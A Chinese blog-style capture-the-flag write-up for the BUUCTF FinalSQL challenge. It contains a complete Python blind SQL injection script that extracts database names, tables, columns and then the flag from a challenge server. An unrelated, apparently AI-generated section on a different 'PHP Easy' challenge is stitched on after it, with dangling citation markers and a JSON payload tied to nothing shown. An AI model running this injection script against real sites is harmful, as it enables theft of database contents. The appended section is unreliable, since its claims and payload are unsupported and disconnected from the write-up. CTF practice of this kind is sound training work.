web buuctf [极客大挑战 2019]FinalSQL

本文探讨了如何利用PHP和Python进行SQL盲注攻击,通过实例展示了如何构造payload并利用BP抓包工具进行测试,最终获取到flag{0273bf0d-1bc6-4bb4-b395-0fc380730ec2}

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点:盲注

1.开题

最上面提示用的语言php,脚本python,数据库mysql,注入形式sql盲注

2.随便点个12345,用bp抓包,进行fuzz

 

 报错盲注,贴脚本

# -*- coding: utf-8 -*-
# @Author: jiaoben
# @Date  :  2020/05/03

import re
import requests
import string

url = "http://dcf33d60-7ffa-41c0-8915-e935ccbdd37b.node3.buuoj.cn//search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
       res = 1
    else:
       res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
              mid = (low + high) // 2
              res = payload(i, mid)
              if res:
                 low = mid + 1
              else:
                 high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
           break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

大佬的wp,自己改一下url。

 得到,flag{0273bf0d-1bc6-4bb4-b395-0fc380730ec2}

### BUUCTF 2019 PHP Easy 题目分析 #### 背景介绍 BUUCTF 是国内知名的 CTF 平台之一,其题目涵盖了多种安全领域。其中 PHP 类型的题目通常涉及反序列化漏洞、输入验证不足等问题。以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行严格校验,则可能导致反序列化漏洞的发生[^1]。 通过构造恶意的对象并将其传递给程序中的 `unserialize()` 方法,攻击者可以触发预期之外的行为,例如执行任意代码或访问敏感数据。 --- #### php://filter 协议的应用 PHP 提供了一些伪协议来处理特定场景下的文件流操作。例如: - `php://input`: 获取原始 POST 数据。 - `php://filter`: 对数据流应用过滤器,常用于绕过某些防护机制或读取文件内容。 当目标环境允许使用这些伪协议时,可以通过它们实现一些有趣的操作,比如以 Base64 编码形式读取远程脚本的内容[^2]。 --- #### 字符串查找函数 mb_strpos() 该函数返回指定子字符串首次出现的位置索引。需要意的是,默认情况下它区分小写;另外还可以自定义字符集编码参数 `$encoding` 来适配多字节字符的需求[^3]。 此知识点虽然看似简单,但在实际利用过程中可能会被用来检测是否存在非法字符或者定位入点等位置信息。 --- #### Payload 构造实例 假设题目存在 JSON 输入解析环节,并且服务器端会对提交过来的数据结构做进一步逻辑判断。那么我们可以尝试如下 payload: ```json { "Information": { "year": "2022abc", "items": [ 0, ["a"], "c" ] } } ``` 上述例子展示了如何精心设计嵌套数组以及特殊字段组合而成的有效载荷[^4]。当然具体形态还需依据实际情况调整优化。 --- #### 综合思考与建议 基于以上理论知识和技术手段,解决此类问题的关键在于深入理解官方给出的功能模块及其潜在缺陷所在之处。同时也要善于运用各种工具辅助完成调试工作。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值